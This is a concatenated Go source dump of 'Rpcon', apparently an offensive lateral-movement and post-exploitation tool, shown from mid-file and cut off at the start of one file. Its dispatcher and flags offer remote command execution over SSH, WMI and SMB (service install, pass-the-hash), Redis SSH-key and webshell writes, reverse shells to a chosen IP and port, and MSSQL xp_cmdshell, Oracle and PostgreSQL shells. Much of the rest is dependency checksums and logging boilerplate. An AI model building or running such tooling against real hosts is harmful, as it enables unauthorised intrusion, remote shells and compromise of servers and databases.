| return text, nil 239 | } 240 | } 241 | return "", err 242 | } 243 | -------------------------------------------------------------------------------- /cmd/run.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | ) 6 | 7 | func Parse() { 8 | common.Parse() 9 | if common.Method != "" { 10 | switch common.Method { 11 | case "ssh": 12 | common.Port = 22 13 | Sshcmd() 14 | case "redis": 15 | common.Port = 6379 16 | Codes() 17 | case "mysql": 18 | common.Port = 3306 19 | Query() 20 | case "mssql": 21 | common.Port = 1433 22 | Mssquery() 23 | case "oracle": 24 | common.Port = 1521 25 | ORquery() 26 | case "postgresql": 27 | common.Port = 5432 28 | PoQuery() 29 | case "smb": 30 | common.Port = 445 31 | Smb() 32 | case "wmi": 33 | common.Port = 135 34 | WmiExec() 35 | } 36 | } 37 | if common.Redis != "" { 38 | switch common.Redis { 39 | case "rk": 40 | common.Port = 6379 41 | Wkey() 42 | case "rs": 43 | common.Port = 6379 44 | Wshell() 45 | case "rn": 46 | common.Port = 6379 47 | ncshell() 48 | case "mysl": 49 | common.Port = 3306 50 | Mysqlshell() 51 | case "mycg": 52 | common.Port = 3306 53 | Myconfig() 54 | case "mssg": 55 | common.Port = 1433 56 | Msscfg() 57 | case "cmshell": 58 | common.Port = 1433 59 | Cmdshell() 60 | case "oleshell": 61 | common.Port = 1433 62 | Oleshell() 63 | case "org": 64 | common.Port = 1521 65 | ORcfg() 66 | case "ors": 67 | common.Port = 1521 68 | ORacleshell() 69 | case "pocfg": 70 | common.Port = 5432 71 | Pocfg() 72 | case "poshell": 73 | common.Port = 5432 74 | Powriteshell() 75 | case "pocode": 76 | common.Port = 5432 77 | Pocode() 78 | } 79 | } else { 80 | con() 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /cmd/smb.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "fmt" 6 | common2 "github.com/Amzza0x00/go-impacket/pkg/common" 7 | DCERPCv5 "github.com/Amzza0x00/go-impacket/pkg/dcerpc/v5" 8 | "github.com/Amzza0x00/go-impacket/pkg/smb/smb2" 9 | "github.com/Amzza0x00/go-impacket/pkg/util" 10 | "os" 11 | ) 12 | 13 | // 1.查找可用共享目录 14 | // 2.上传文件 15 | // 3.打开远程服务 16 | // 4.创建服务并启动 17 | 18 | var service string 19 | 20 | func init() { 21 | 22 | } 23 | 24 | func Smb() { 25 | debug := false 26 | option := common.ClientOption{ 27 | Host: common.Host, 28 | Port: 445, 29 | Domain: common.Domain, 30 | User: common.User, 31 | Password: common.Password, 32 | Hash: common.Hash, 33 | } 34 | session, err := smb2.NewSession(common2.ClientOptions(option), debug) 35 | if err != nil { 36 | os.Exit(0) 37 | } 38 | defer session.Close() 39 | if session.IsAuthenticated { 40 | } 41 | var serviceName string 42 | if service == "" { 43 | serviceName = string(util.Random(4)) 44 | } else { 45 | serviceName = service 46 | } 47 | rpc, _ := DCERPCv5.SMBTransport() 48 | rpc.Client = *session 49 | // 创建服务并启动 50 | servicename, _, _ := rpc.ServiceInstall(serviceName, common.File, common.Path) 51 | fmt.Printf("[+] Service name is [%s]\n", servicename) 52 | } 53 | -------------------------------------------------------------------------------- /cmd/ssh.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "fmt" 6 | "golang.org/x/crypto/ssh" 7 | "log" 8 | "time" 9 | ) 10 | 11 | func Sshcmd() { 12 | 13 | //创建sshp登陆配置 14 | config := &ssh.ClientConfig{ 15 | Timeout: time.Second, //ssh 连接time out 时间一秒钟, 如果ssh验证错误 会在一秒内返回 16 | User: common.User, 17 | HostKeyCallback: ssh.InsecureIgnoreHostKey(), //这个可以, 但是不够安全 18 | //HostKeyCallback: hostKeyCallBackFunc(h.Host), 19 | } 20 | 21 | config.Auth = []ssh.AuthMethod{ssh.Password(common.Password)} 22 | 23 | //dial 获取ssh client 24 | addr := fmt.Sprintf("%s:%d", common.Host, common.Port) 25 | sshClient, err := ssh.Dial("tcp", addr, config) 26 | if err != nil { 27 | log.Fatal("创建ssh client 失败", err) 28 | } 29 | defer sshClient.Close() 30 | 31 | //创建ssh-session 32 | session, err := sshClient.NewSession() 33 | if err != nil { 34 | log.Fatal("创建ssh session 失败", err) 35 | } 36 | defer session.Close() 37 | //执行远程命令 38 | //var b bytes.Buffer 39 | //session.Stdout = &b 40 | combo, err := session.CombinedOutput(common.Code) 41 | if err != nil { 42 | log.Fatal("远程执行cmd 失败", err) 43 | } 44 | //fmt.Println(b.String()) 45 | fmt.Println(string(combo)) 46 | 47 | } 48 | 49 | //func publicKeyAuthFunc(kPath string) ssh.AuthMethod { 50 | // 51 | // keyPath, err := homedir.Expand(kPath) 52 | // if err != nil { 53 | // log.Fatal("find key's home dir failed", err) 54 | // } 55 | // key, err := ioutil.ReadFile(keyPath) 56 | // if err != nil { 57 | // log.Fatal("ssh key file read failed", err) 58 | // } 59 | // // Create the Signer for this private key. 60 | // signer, err := ssh.ParsePrivateKey(key) 61 | // if err != nil { 62 | // log.Fatal("ssh key signer failed", err) 63 | // } 64 | // return ssh.PublicKeys(signer) 65 | //} 66 | 67 | //cmds := strings.Split(common.Code, ";") 68 | //for _, cmd := range cmds { 69 | //cmd = strings.TrimSpace(cmd) 70 | //if len(cmd) == 0 { 71 | //continue 72 | //} 73 | -------------------------------------------------------------------------------- /cmd/wmiex.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "fmt" 7 | "strings" 8 | "time" 9 | ) 10 | 11 | var flag = false 12 | 13 | func WmiExec() (tmperr error) { 14 | starttime := time.Now().Unix() 15 | flag, err := pkg.Wmiexec() 16 | errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", common.Host, 445, common.User, common.Password, err) 17 | errlog = strings.Replace(errlog, "\n", "", -1) 18 | pkg.LogError(errlog) 19 | if flag == true { 20 | var result string 21 | if common.Domain != "" { 22 | result = fmt.Sprintf("[+] WmiExec:%v:%v:%v\\%v ", common.Host, common.Port, common.Domain, common.User) 23 | } else { 24 | result = fmt.Sprintf("[+] WmiExec:%v:%v:%v ", common.Host, common.Port, common.User) 25 | } 26 | if common.Hash != "" { 27 | result += "hash: " + common.Hash 28 | } else { 29 | result += common.Password 30 | } 31 | pkg.LogSuccess(result) 32 | return err 33 | } else { 34 | tmperr = err 35 | if pkg.CheckErrs(err) { 36 | return err 37 | } 38 | if time.Now().Unix()-starttime > (int64(len(common.User)*len(common.Password)) * common.Timeout) { 39 | return err 40 | } 41 | } 42 | if len(common.Hash) == 32 { 43 | return 44 | } 45 | return tmperr 46 | } 47 | -------------------------------------------------------------------------------- /common/config.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | var ( 4 | Host string 5 | User string 6 | Password string 7 | Port int 8 | Method string 9 | Code string 10 | DBname string 11 | File string 12 | Help bool 13 | Hash string 14 | Domain string 15 | Timeout int64 = 3 16 | ) 17 | 18 | var ( 19 | Redis string 20 | wkey string 21 | Wshell string 22 | wcode string 23 | Path string 24 | Wport string 25 | ) 26 | 27 | type ClientOption struct { 28 | Host string 29 | Port int 30 | Workstation string 31 | Domain string 32 | User string 33 | Password string 34 | Hash string 35 | } 36 | -------------------------------------------------------------------------------- /common/flag.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import "flag" 4 | 5 | func Flag() { 6 | flag.StringVar(&Host, "h", "", "host | -h 192.168.1.1") 7 | flag.IntVar(&Port, "p", 22, "port | ssh -p 22") 8 | flag.StringVar(&User, "u", "", "user | root") 9 | flag.StringVar(&Password, "pw", "", "password | rpcon -h 192.168.1.1 -p 22 -u root -pw root") 10 | flag.StringVar(&Code, "c", "", "code | rpcon -h 192.168.1.1 -p 22 -u root -pw root -c whoami\nfor redis\n -c wk write key\n -c wshell write webshell\n -c shell -ws 192.168.1.1 -wp 666") 11 | flag.StringVar(&Domain, "domain", "", "") 12 | flag.StringVar(&Hash, "hash", "", "") 13 | flag.StringVar(&Method, "m", "", "method | rpcon -h 192.168.1.1:22 -u root -p root -m ssh -c id") 14 | flag.StringVar(&Redis, "r", "", "sql shell | -r rk | -r rs") 15 | flag.StringVar(&Path, "pt", "/var/www/html/", "path") 16 | flag.StringVar(&Wshell, "ws", "", "ws 反弹shell的ip") 17 | flag.StringVar(&Wport, "wp", "", "wp 反弹shell的端口") 18 | flag.StringVar(&File, "f", "", "filename") 19 | flag.StringVar(&DBname, "d", "", "数据库名称") 20 | flag.Parse() 21 | } 22 | -------------------------------------------------------------------------------- /common/parse.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "flag" 5 | "os" 6 | ) 7 | 8 | func Parse() { 9 | if Host == "" && Password == "" && Method == "" { 10 | flag.Usage() 11 | os.Exit(0) 12 | } 13 | if Host == "" && Password == "" { 14 | flag.Usage() 15 | os.Exit(0) 16 | } 17 | 18 | } 19 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module Rpcon 2 | 3 | go 1.18 4 | 5 | require ( 6 | github.com/Amzza0x00/go-impacket v0.2.2 7 | github.com/C-Sto/goWMIExec v0.0.1-deva.0.20210704154847-b8ebd6464a06 8 | github.com/denisenkom/go-mssqldb v0.12.3 9 | github.com/go-sql-driver/mysql v1.7.0 10 | github.com/lib/pq v1.10.7 11 | github.com/sijms/go-ora/v2 v2.7.3 12 | golang.org/x/crypto v0.7.0 13 | ) 14 | 15 | require ( 16 | github.com/go-redis/redis/v8 v8.11.5 17 | golang.org/x/sys v0.6.0 // indirect 18 | ) 19 | 20 | require ( 21 | github.com/cespare/xxhash/v2 v2.1.2 // indirect 22 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f // indirect 23 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe // indirect 24 | github.com/golang-sql/sqlexp v0.1.0 // indirect 25 | go.uber.org/atomic v1.7.0 // indirect 26 | go.uber.org/multierr v1.6.0 // indirect 27 | go.uber.org/zap v1.24.0 // indirect 28 | golang.org/x/text v0.8.0 // indirect 29 | ) 30 | 31 | replace github.com/C-Sto/goWMIExec v0.0.1-deva.0.20210704154847-b8ebd6464a06 => github.com/shadow1ng/goWMIExec v0.0.2 32 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Amzza0x00/go-impacket v0.2.2 h1:+LPh394IB86m0qbGTk/HPVVcOK0g1lDTXRp8QH2FYJ4= 2 | github.com/Amzza0x00/go-impacket v0.2.2/go.mod h1:xi87fs60ycI8HNSRgu19kku+RMdgVevzEk6KG8fPIq4= 3 | github.com/Azure/azure-sdk-for-go/sdk/azcore v0.19.0/go.mod h1:h6H6c8enJmmocHUbLiiGY6sx7f9i+X3m1CHdd5c6Rdw= 4 | github.com/Azure/azure-sdk-for-go/sdk/azidentity v0.11.0/go.mod h1:HcM1YX14R7CJcghJGOYCgdezslRSVzqwLf/q+4Y2r/0= 5 | github.com/Azure/azure-sdk-for-go/sdk/internal v0.7.0/go.mod h1:yqy467j36fJxcRV2TzfVZ1pCb5vxm4BtZPUdYWe/Xo8= 6 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= 7 | github.com/benbjohnson/clock v1.1.0 h1:Q92kusRqC1XV2MjkWETPvjJVqKetz1OzxZB7mHJLju8= 8 | github.com/cespare/xxhash/v2 v2.1.2 h1:YRXhKfTDauu4ajMg1TPgFO5jnlC2HCbmLXMcTG5cbYE= 9 | github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= 10 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 11 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 12 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 13 | github.com/denisenkom/go-mssqldb v0.12.3 h1:pBSGx9Tq67pBOTLmxNuirNTeB8Vjmf886Kx+8Y+8shw= 14 | github.com/denisenkom/go-mssqldb v0.12.3/go.mod h1:k0mtMFOnU+AihqFxPMiF05rtiDrorD1Vrm1KEz5hxDo= 15 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78= 16 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f/go.mod h1:cuUVRXasLTGF7a8hSLbxyZXjz+1KgoB3wDUb6vlszIc= 17 | github.com/dnaeon/go-vcr v1.2.0/go.mod h1:R4UdLID7HZT3taECzJs4YgbbH6PIGXB6W/sc5OLb6RQ= 18 | github.com/fsnotify/fsnotify v1.4.9 h1:hsms1Qyu0jgnwNXIxa+/V/PDsU6CfLf6CNO8H7IWoS4= 19 | github.com/go-redis/redis/v8 v8.11.5 h1:AcZZR7igkdvfVmQTPnu9WE37LRrO/YrBH5zWyjDC0oI= 20 | github.com/go-redis/redis/v8 v8.11.5/go.mod h1:gREzHqY1hg6oD9ngVRbLStwAWKhA0FEgq8Jd4h5lpwo= 21 | github.com/go-sql-driver/mysql v1.7.0 h1:ueSltNNllEqE3qcWBTD0iQd3IpL/6U+mJxLkazJ7YPc= 22 | github.com/go-sql-driver/mysql v1.7.0/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI= 23 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= 24 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= 25 | github.com/golang-sql/sqlexp v0.1.0 h1:ZCD6MBpcuOVfGVqsEmY5/4FtYiKz6tSyUv9LPEDei6A= 26 | github.com/golang-sql/sqlexp v0.1.0/go.mod h1:J4ad9Vo8ZCWQ2GMrC4UCQy1JpCbwU9m3EOqtpKwwwHI= 27 | github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= 28 | github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= 29 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= 30 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 31 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= 32 | github.com/lib/pq v1.10.7 h1:p7ZhMD+KsSRozJr34udlUrhboJwWAgCg34+/ZZNvZZw= 33 | github.com/lib/pq v1.10.7/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= 34 | github.com/modocache/gover v0.0.0-20171022184752-b58185e213c5/go.mod h1:caMODM3PzxT8aQXRPkAt8xlV/e7d7w8GM5g0fa5F0D8= 35 | github.com/nxadm/tail v1.4.8 h1:nPr65rt6Y5JFSKQO7qToXr7pePgD6Gwiw05lkbyAQTE= 36 | github.com/onsi/ginkgo v1.16.5 h1:8xi0RTUf59SOSfEtZMvwTvXYMzG4gV23XVHOZiXNtnE= 37 | github.com/onsi/gomega v1.18.1 h1:M1GfJqGRrBrrGGsbxzV5dqM2U2ApXefZCQpkukxYRLE= 38 | github.com/pkg/browser v0.0.0-20180916011732-0a3d74bf9ce4/go.mod h1:4OwLy04Bl9Ef3GJJCoec+30X3LQs/0/m4HFRt/2LUSA= 39 | github.com/pkg/errors v0.8.1 h1:iURUrRGxPUNPdy5/HRSm+Yj6okJ6UtLINN0Q9M4+h3I= 40 | github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= 41 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 42 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 43 | github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= 44 | github.com/shadow1ng/goWMIExec v0.0.2 h1:tZdno/F0JVwwpX34fidRqnT7lvobUgelyb/wWd7YgcM= 45 | github.com/shadow1ng/goWMIExec v0.0.2/go.mod h1:SWfWb5+XTfacyp4OULdNsxOdsQTjFEpAUEn5JGTCMIA= 46 | github.com/sijms/go-ora/v2 v2.7.3 h1:ppqaCq/qfc/xqr9ZCVOm7IHbzSkvArg/Bz9P1RgBwno= 47 | github.com/sijms/go-ora/v2 v2.7.3/go.mod h1:EHxlY6x7y9HAsdfumurRfTd+v8NrEOTR3Xl4FWlH6xk= 48 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 49 | github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= 50 | github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= 51 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 52 | github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk= 53 | go.uber.org/atomic v1.5.0/go.mod h1:sABNBOSYdrvTF6hTgEIbc7YasKWGhgEQZyfxyTvoXHQ= 54 | go.uber.org/atomic v1.7.0 h1:ADUqmZGgLDDfbSL9ZmPxKTybcoEYHgpYfELNoN+7hsw= 55 | go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= 56 | go.uber.org/goleak v1.1.11 h1:wy28qYRKZgnJTxGxvye5/wgWr1EKjmUDGYox5mGlRlI= 57 | go.uber.org/multierr v1.3.0/go.mod h1:VgVr7evmIr6uPjLBxg28wmKNXyqE9akIJ5XnfpiKl+4= 58 | go.uber.org/multierr v1.6.0 h1:y6IPFStTAIT5Ytl7/XYmHvzXQ7S3g/IeZW9hyZ5thw4= 59 | go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= 60 | go.uber.org/tools v0.0.0-20190618225709-2cfd321de3ee/go.mod h1:vJERXedbb3MVM5f9Ejo0C68/HhF8uaILCdgjnY+goOA= 61 | go.uber.org/zap v1.14.0/go.mod h1:zwrFLgMcdUuIBviXEYEH1YKNaOBnKXsx2IPda5bBwHM= 62 | go.uber.org/zap v1.24.0 h1:FiJd5l1UOLj0wCgbSE0rwwXHzEdAZS6hiiSnxJN/D60= 63 | go.uber.org/zap v1.24.0/go.mod h1:2kMP+WWQ8aoFoedH3T2sq6iJ2yDWpHbP0f6MQbS9Gkg= 64 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 65 | golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= 66 | golang.org/x/crypto v0.0.0-20200221231518-2aa609cf4a9d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 67 | golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 68 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= 69 | golang.org/x/crypto v0.7.0 h1:AvwMYaRytfdeVt3u6mLaxYtErKYjxA2OXjJ1HHq6t3A= 70 | golang.org/x/crypto v0.7.0/go.mod h1:pYwdfH91IfpZVANVyUOhSIPZaFoJGxTFbZhFTx+dXZU= 71 | golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= 72 | golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc= 73 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 74 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 75 | golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= 76 | golang.org/x/net v0.0.0-20210610132358-84b48f89b13b/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 77 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 78 | golang.org/x/net v0.8.0 h1:Zrh2ngAOFYneWTAIAPethzeaQLuHwhuBkuV6ZiRnUaQ= 79 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 80 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 81 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 82 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 83 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 84 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 85 | golang.org/x/sys v0.6.0 h1:MVltZSvRTcU2ljQOhs94SXPftV6DCNnZViHeQps87pQ= 86 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 87 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 88 | golang.org/x/term v0.6.0 h1:clScbb1cHjoCkyRbWwBEUZ5H/tIFu5TAXIqaZD0Gcjw= 89 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 90 | golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= 91 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 92 | golang.org/x/text v0.8.0 h1:57P1ETyNKtuIjB4SRd15iJxuhj8Gc416Y78H3qgMh68= 93 | golang.org/x/text v0.8.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= 94 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 95 | golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 96 | golang.org/x/tools v0.0.0-20190621195816-6e04913cbbac/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc= 97 | golang.org/x/tools v0.0.0-20191029041327-9cc4af7d6b2c/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= 98 | golang.org/x/tools v0.0.0-20191029190741-b9c20aec41a5/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= 99 | golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 100 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 101 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 102 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI= 103 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ= 104 | gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 105 | gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 106 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= 107 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 108 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 109 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 110 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 111 | honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg= 112 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | cmdpackage "Rpcon/cmd" 5 | "Rpcon/common" 6 | ) 7 | 8 | func main() { 9 | common.Flag() 10 | cmdpackage.Parse() 11 | } 12 | -------------------------------------------------------------------------------- /pkg/PrintRow.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 | import ( 4 | "fmt" 5 | "time" 6 | ) 7 | 8 | func PrintRow(colsdata []interface{}) { 9 | for _, val := range colsdata { 10 | switch v := (*(val.(*interface{}))).(type) { 11 | case nil: 12 | fmt.Print("NULL") 13 | case bool: 14 | if v { 15 | fmt.Print("True") 16 | } else { 17 | fmt.Print("False") 18 | } 19 | case []byte: 20 | fmt.Print(string(v)) 21 | case time.Time: 22 | fmt.Print(v.Format("2023-01-01 11:11:11.999")) 23 | default: 24 | fmt.Print(v) 25 | } 26 | fmt.Print("\t") 27 | } 28 | fmt.Println() 29 | } 30 | -------------------------------------------------------------------------------- /pkg/log.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | "sync" 8 | "time" 9 | ) 10 | 11 | var Num int64 12 | var End int64 13 | var Results = make(chan *string) 14 | var Start = true 15 | var LogSucTime int64 16 | var LogErrTime int64 17 | var WaitTime int64 18 | var Silent bool 19 | var LogWG sync.WaitGroup 20 | 21 | func LogSuccess(result string) { 22 | LogWG.Add(1) 23 | LogSucTime = time.Now().Unix() 24 | Results <- &result 25 | } 26 | 27 | func LogError(errinfo interface{}) { 28 | if WaitTime == 0 { 29 | fmt.Printf(" %v/%v %v \n", End, Num, errinfo) 30 | os.Exit(0) 31 | } else if (time.Now().Unix()-LogSucTime) > WaitTime && (time.Now().Unix()-LogErrTime) > WaitTime { 32 | fmt.Printf(" %v/%v %v \n", End, Num, errinfo) 33 | LogErrTime = time.Now().Unix() 34 | os.Exit(0) 35 | } 36 | } 37 | 38 | func CheckErrs(err error) bool { 39 | if err == nil { 40 | return false 41 | } 42 | errs := []string{ 43 | "closed by the remote host", "too many connections", 44 | "i/o timeout", "EOF", "A connection attempt failed", 45 | "established connection failed", "connection attempt failed", 46 | "Unable to read", "is not allowed to connect to this", 47 | "no pg_hba.conf entry", 48 | "No connection could be made", 49 | "invalid packet size", 50 | "bad connection", 51 | } 52 | for _, key := range errs { 53 | if strings.Contains(strings.ToLower(err.Error()), strings.ToLower(key)) { 54 | return true 55 | } 56 | } 57 | return false 58 | } 59 | -------------------------------------------------------------------------------- /pkg/readfile.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 